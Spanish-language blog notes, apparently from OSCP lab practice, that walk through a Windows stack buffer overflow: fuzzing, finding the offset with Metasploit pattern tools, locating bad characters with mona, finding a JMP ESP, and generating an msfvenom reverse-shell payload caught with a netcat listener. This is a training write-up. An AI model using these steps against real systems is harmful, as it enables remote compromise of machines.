python fuzzer.py

Pasted image 20210617074932.png

/usr/share/metasploit-framework/tools/exploit/pattern\_create.rb -l 1000 o se puede usar esto msf-pattern_create -l 1000

Pasted image 20210617075158.png

python3 exploit.py

!mona findmsp -distance 1000

Pasted image 20210617075501.png

Ahora cambiamos el offset en el archivo de exploit.py al numero offset Y tambien rtn le ponemos un valor de "BBBB"

Pasted image 20210617075501.png

Reiniciar app

!mona bytearray -b "\x00"

chequear que bytearray.bin este generado en el folder de mona

python3 bad_characters.py

Pasted image 20210616112718.png

Reiniciar app Pegar el output a payload

!mona compare -f C:\mona\oscp\bytearray.bin -a <address>

escribimos los bad chars 00 16 17 2f 30 f4 f5 fd

Ahora los bad chars son 16 17 2f 30 f4 f5 fd \x00\

Pasted image 20210617080716.png

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210617081142.png

Le quitamos el x16 del payload hasta llegar al ultimo bad_char

Pasted image 20210617081236.png

Ahora los bad chars son 2f 30 f4 f5 fd \x00\x16\

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210617081342.png

Le quitamos el x2f del payload hasta llegar al ultimo bad_char

Pasted image 20210617081511.png

Ahora los bad chars son fd \x00\x16\x2f\xf4

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210617081921.png

Le quitamos el xf4 del payload hasta llegar al ultimo bad_char

Pasted image 20210617082107.png

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210617082332.png

Le quitamos el xfd del payload hasta llegar al ultimo bad_char

Pasted image 20210617082409.png

Ahora los bad chars son
\x00\x16\x2f\xf4\xfd

--Al terminar cambiando todos los bad chars deberia de salir unmodified como ultimo paso y nada de bad_chars

!mona jmp -r esp -cpb "\x00\x16\x2f\xf4\xfd"

Pasted image 20210617082657.png

Agarramos el numero #

Pasted image 20210617083034.png

cambiamos el rtn y iniciamos payload='' esto en exploit.py

msfvenom -p windows/shell\_reverse\_tcp LHOST=KALI_IP LPORT=4444 EXITFUNC=thread -b "\x00\x16\x2f\xf4\xfd" -f c

padding = "\x90" * 16

nc -lvnp 4444

Pasted image 20210617084451.png

blog

copyright©2022 Cu3rv0x all rights reserved